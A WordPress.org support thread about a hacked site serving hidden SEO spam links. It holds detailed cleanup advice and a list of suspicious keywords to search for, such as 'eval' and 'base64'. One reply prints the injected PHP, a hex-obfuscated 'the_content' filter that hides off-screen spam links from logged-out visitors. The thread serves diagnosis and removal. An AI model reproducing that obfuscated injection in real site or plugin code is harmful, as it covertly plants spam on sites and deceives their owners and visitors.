Title: Known javascript malware. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?s
Last modified: July 20, 2017

---

# Known javascript malware. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?s

 *  [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/)
 * Just trying to get a bit of assistance with finding this.
 *     ```
       Known javascript malware. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?spam-seo.hidden_content.62
       <div style="position:absolute;top:0;left:-9999px;">Want create site? Find <a href="http://dlwordpress.com/">Free WordPress Themes</a> and plugins.</div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-8"><div class="vc_column-inner "><div class="wpb_wrapper">
       ```
   
 * It shows that is was found on these pages.
 * home page
    my-account orders edit-address order-tracking
 * I can’t seem to locate the code in the data base. I have also reverted to a backup
   of my files and installed clean core files. I keep trying to scan with Wordfence
   but it keeps timing out.
 * Thanks in advance.

Viewing 15 replies - 1 through 15 (of 15 total)

 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9335290)
 * Hello, BaldEmotions, & welcome. I’m really sorry this is happening to you. This
   is long. Please read it, & please let us know if there’s anything you don’t understand/
   if you have questions.
 *  A resource you can go to is:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * When dealing w/a site compromise, the objectives are twofold:
    1) Fix the site;&
   2) Fix backdoors that the hacker used to gain entrance into your site, so this
   hopefully will not happen again.
 * Most people place great emphasis on objective #1, but, in truth, the 2nd one 
   is actually the most important, as, without it, your site will continue to be
   reinfected.
 * Here are the steps to take.
 * First, notify your host, as this might be a serverside hack as opposed to simply
   a site compromise. Also, if you’re on shared hosting, the hack has the potential
   to compromise the entire server. Additionally, you may wish to take the site 
   offline, & your host can help you do this. They might not help you–then again,
   they might. You won’t know unless you notify them. If they say it’s not their
   responsibility, (& it really may not be), then please continue reading.
 * Second, scan any devices you will use to log onto your website for malware. It
   does no good to change credentials, etc., which you will need to do, if malware
   phones them home to their command & control center. It’s actually better to do
   more than 1 scan, each using a different program, as no single malware scanner
   can detect everything.
 * Third, secure your network. Definitively use secure FTP as opposed to regular
   FTP. The port used for secure FTP varies from host to host. Many use port 22,
   some 2222, while others use different ports altogether. Check their knowledge
   base or call their support. You can ask this question when you notify them of
   the compromise in the first step.
 * Never log onto your site using a public hotspot, such as those in hotels, cafes,
   etc. Make sure you’ve changed the default password, Ssid, (&, if applicable) 
   the username on your router/modem. If you don’t use wireless, turn it off in 
   your router’s options.
 * All these steps are required to ensure that no one can snoop your credentials,
   etc.
 * Now that the device you’ll use to fix your site, as well as your network, is 
   secure, it’s time to direct your attention to actually fixing your site.
 * Next, please log into your website control panel from a secure connection and
   change all passwords, including those to any databases you may have set up. This
   includes your control panel/FTP credentials & your WordPress database. Also, 
   please open your wp-config.php file & change your salt keys as per the instructions
   there in order to log out all users. Please make the passwords long, containing
   upper & lowercase letters, numbers, & punctuation. See
    [http://www.brighter-vision.com/protect-yourself-with-passwords-or-pay](http://www.brighter-vision.com/protect-yourself-with-passwords-or-pay)
   for examples of how to do this, some of which are from folks who are decidedly
   nontechnical. You’ll need to edit your wp-config.php & change the database password
   there as well.
 * Next, take a backup of your website’s files. Be certain to label it such that
   the label contains both the date you backed it up on, as well as the word “hacked”–
   we certainly don’t want you accidentally restoring this backup! This can be helpful,
   though, in terms of perhaps being able to determine how this occurred, though
   my feeling is that it likely did so because of an outdated site. Probably you
   should just back up your web root. Depending on your host, it might be called
   public_html, htdocs, www, or /. If you don’t wish to back up the entire root,
   then at least back up your uploads folder, as well as others that might contain
   user-generated content that can’t be replaced.
 * Please also back up your database as well. The article at
    [http://codex.wordpress.org/Backing_Up_Your_Database](http://codex.wordpress.org/Backing_Up_Your_Database)
   shows you how to do that, in case you need it. The section regarding phpMyadmin
   is likely the most relevant to your case. I also have a shorter, somewhat less
   technical article, at [https://brighter-vision.com/2016/07/24/backing-up-your-database-with-phpmyadmin/](https://brighter-vision.com/2016/07/24/backing-up-your-database-with-phpmyadmin/),
   which you may find easier. It’s going to be necessary to search that database
   file to see if any evidence of the hack exists there. That can be done by opening
   the file in a text editor. To start off with, consider searching for the words:
 *     ```
       <script
       <? php;
       base64;
       eval 
       ```
   
 * preg_replace
    strrev
 * Please note that this is not an exhaustive list, nor is the presence of any of
   these words conclusive proof of a site compromise, though some are more suggestive
   than others.
 * You might also wish at this point to backup your WordPress content. To do that:
   *
   Log into your WordPress dashboard. * Go to ‘Tools > Export’. * Choose to export
   all content.
 * While in your dashboard, go to ‘Users > All Users’ and delete any users there
   that you don’t recognize, especially administrators. A WordPress account should
   never contain the username ‘admin’. If yours does, make an administrative account
   that does not contain the word admin (don’t forget to use a very strong password),
   then delete the old admin username account.
 * Also be advised that sometimes supposed image files can contain code, so open
   all your image files, particularly in your uploads folders, to ensure they really
   are images & don’t contain code. Better yet, if you have the images on your machine,
   replace files in the uploads folders with them.
 * If you find nothing, either in your database or in your /uploads folders, then
   the next step is to delete, then completely reinstall WordPress, as well as any
   plugins or themes you were using. I also advise creating an entirely new database
   w/a new user & password. You can then import your content into the newly reinstalled
   site.
 * Please also let someone knowledgeable look at your .htaccess file so they can
   make certain no backdoor code exists there. Feel free to paste it here, enclosing
   it in , ie:
 *     ```
       line 1
       line 2
       ```
   
 * Or you can simply delete your .htaccess file & use the one WordPress generates
   when saving permalinks, but if your .htaccess file has other options besides 
   those in the WordPress section, then that may not be the best course of action
   to take.
 * In summary, here are the steps:
    1) Back up your WordPress files, including core,
   themes, & plugins; 2) Back up your database using PhpMyadmin; 3) Look through
   the database to insure there is no evidence of the hack; 4) Search the uploads
   folders for image files that contain code; 5) Reinstall WordPress, including 
   plugins & themes you were using, from known good copies. 6) Let someone knowledgeable
   look at your .htaccess file. 7) If you have doubts about your database, please
   have a professional take a look.
 * You should also join Google Search Console if you haven’t already to find out
   if they’re flagging anything. Once you’re certain the site is cleaned up, you
   can request a review/reconsideration from Google if indeed they found bad content.
   Others may flag your site as well, causing browser warnings. In order to get 
   these cleared, you may need to go to stopbadware.org & request a review.
 * It’s a pretty involved process, unfortunately, but following the steps methodically&
   carefully should result in the desired outcome.
 *  Thread Starter [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338563)
 * I am honestly not able to locate this anywhere in the SQL database.
    But here
   it is on line 276 of this post.
 * [https://search.google.com/structured-data/testing-tool/u/0/?url=https://www.sumocakes.com/order-tracking/#url=https%3A%2F%2Fwww.sumocakes.com%2Forder-tracking%2F](https://search.google.com/structured-data/testing-tool/u/0/?url=https://www.sumocakes.com/order-tracking/#url=https%3A%2F%2Fwww.sumocakes.com%2Forder-tracking%2F)
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338641)
 * It looks like it’s actually embedded in a stylesheet & positioned so that it’s
   off screen. Having said that, please understand that unless you not only fix 
   the corrupted files but also secure your site, the hack will simply recur. It
   may take another form, but it will at some point rear its ugly head again.
 *  Thread Starter [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338656)
 * I will keep looking, but I am unable to locate it. Some scanners say I am clean
   but I am not. Any other tips?
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338670)
 * I think, Friend, you really just need to reinstall WordPress, including your 
   plugins, themes, & user-generated content. Change the passwords to your hosting
   provider’s control panel, your WordPress dashboard, & your database.
 * If 1 file has been compromised, chances are others have as well. WordFence can
   sometimes help find them, but you’ve already indicated that the scan times out.
   You may be able to increase max execution time as well as memory limit in your
   hosting provider’s control panel. Some allow this, many do not.
 *  Thread Starter [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338746)
 * Found the injection. I think its the injection anyway.
 *     ```
       if( ! function_exists('sorry_function')){
       	function sorry_function($content) {
       	if (is_user_logged_in()){return $content;} else {if(is_page()||is_single()){
       		$vNd25 = "\74\144\151\x76\40\163\x74\x79\154\145\x3d\42\x70\157\x73\151\164\x69\x6f\x6e\72\141\x62\x73\x6f\154\165\164\145\73\164\157\160\x3a\60\73\154\145\146\x74\72\55\71\71\x39\71\x70\170\73\42\x3e\x57\x61\x6e\x74\40\x63\162\145\x61\x74\x65\40\163\151\164\x65\x3f\x20\x46\x69\x6e\x64\40\x3c\x61\x20\x68\x72\145\146\75\x22\x68\x74\164\x70\72\x2f\57\x64\x6c\x77\x6f\162\144\x70\x72\x65\163\163\x2e\x63\x6f\x6d\57\42\76\x46\x72\145\145\40\x57\x6f\x72\x64\x50\162\x65\163\x73\x20\124\x68\x65\155\145\x73\x3c\57\x61\76\40\x61\x6e\144\x20\x70\x6c\165\147\x69\156\x73\x2e\x3c\57\144\151\166\76";
       		$zoyBE = "\74\x64\x69\x76\x20\x73\x74\171\154\145\x3d\x22\x70\157\163\x69\x74\x69\x6f\156\x3a\141\142\163\x6f\154\x75\164\x65\x3b\x74\157\160\72\x30\73\x6c\x65\x66\164\72\x2d\x39\71\71\x39\x70\x78\73\42\x3e\104\x69\x64\x20\x79\x6f\165\40\x66\x69\156\x64\40\141\x70\153\40\146\157\162\x20\x61\156\144\162\x6f\151\144\77\40\x59\x6f\x75\x20\x63\x61\156\x20\146\x69\x6e\x64\40\156\145\167\40\74\141\40\150\162\145\146\x3d\x22\150\x74\x74\160\163\72\57\x2f\x64\154\x61\156\x64\x72\157\151\x64\62\x34\56\x63\x6f\155\x2f\42\x3e\x46\x72\145\x65\40\x41\x6e\x64\x72\157\151\144\40\107\141\x6d\145\x73\74\x2f\x61\76\40\x61\156\x64\x20\x61\160\x70\163\x2e\74\x2f\x64\x69\x76\76";
       		$fullcontent = $vNd25 . $content . $zoyBE; } else { $fullcontent = $content; } return $fullcontent; }}
       add_filter('the_content', 'sorry_function');}
       ```
   
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338774)
 * Good job! But is that the only 1? & how did it/they get there in the first place?
 *  Thread Starter [BaldEmotions](https://wordpress.org/support/users/baldemotions/)
 * (@baldemotions)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9338777)
 * Not sure, but I have one more plugin to check that I updated that day.
 *  [StellaQ](https://wordpress.org/support/users/stellaq/)
 * (@stellaq)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9389489)
 * [@baldemotions](https://wordpress.org/support/users/baldemotions/), I have this
   exact same issue. Can you please give me some guidance with regard to how you
   tracked down the “sorry function” in the infected plugin? Did you have to open
   each plugin’s PHP files and look through the code manually?
 * Any help would be greatly appreciated.
    -  This reply was modified 8 years, 10 months ago by [StellaQ](https://wordpress.org/support/users/stellaq/).
      Reason: Fixed typos!
 *  [StellaQ](https://wordpress.org/support/users/stellaq/)
 * (@stellaq)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9389535)
 * [@baldemotions](https://wordpress.org/support/users/baldemotions/), I found the
   plugin with the rogue PHP code and removed it (manual process). The problem seems
   to be fixed. Should I be concerned by the Sucuri error message that refers to
   known “Javascript” malware.
 *  [deanljbirch](https://wordpress.org/support/users/deanljbirch/)
 * (@deanljbirch)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9649567)
 * Hey [@baldemotions](https://wordpress.org/support/users/baldemotions/) & [@stellaq](https://wordpress.org/support/users/stellaq/),
   any details on what plugins contained the code? If you remember the file names
   that would be great too.
 * How did you manage to locate it?
 * Sucuri says it’s there, Facebook sharing shows the Open Graph details w of the
   script but no idea where it is.
 * Word fence, malicious checker, exploit scanner all show nothing similar.
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9649632)
 * Hello, deanljbirch, & welcome. Did you perchance check the Wordfence options 
   to check theme & plugin files?
 *  [deanljbirch](https://wordpress.org/support/users/deanljbirch/)
 * (@deanljbirch)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9650386)
 * Hello [@abletec](https://wordpress.org/support/users/abletec/),
 * Yes. However, nothing is actually flagged.
 * It’s getting extremely stressful as I have tried everything to resolve this.
 *  [abletec](https://wordpress.org/support/users/abletec/)
 * (@abletec)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9650730)
 * Can you please provide a site url?
 *  [g0tr00t](https://wordpress.org/support/users/g0tr00t/)
 * (@g0tr00t)
 * [8 years, 6 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9769783)
 * Sorry for the late reply, but based off your flagged content and Sucuri’s SiteCheck
   scanner; it looks like this specific problem originated from a nulled theme or
   plugin. A nulled theme or plugin is usually a reference to premium, or paid, 
   themes and plugins that are offered for free on websites other than the verified
   source (usually the creator/owner or wordpress.org library of themes and plugins).
 * I won’t get into the ethics discussion surrounding the topic of nullified software,
   but it’s almost never worth the time or trouble to use it on serious and/or business
   related websites.
 * One final thing to mention is that they aren’t always advertised as a nulled,
   or cracked, plugin/theme but may use something more subtle like “free version”
   or the like.
 * Hope this helps someone in the future 🙂

Viewing 15 replies - 1 through 15 (of 15 total)

The topic ‘Known javascript malware. Details: http://sucuri.net/malware/entry/MW:
SPAM:SEO?s’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 15 replies
 * 5 participants
 * Last reply from: [g0tr00t](https://wordpress.org/support/users/g0tr00t/)
 * Last activity: [8 years, 6 months ago](https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/#post-9769783)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics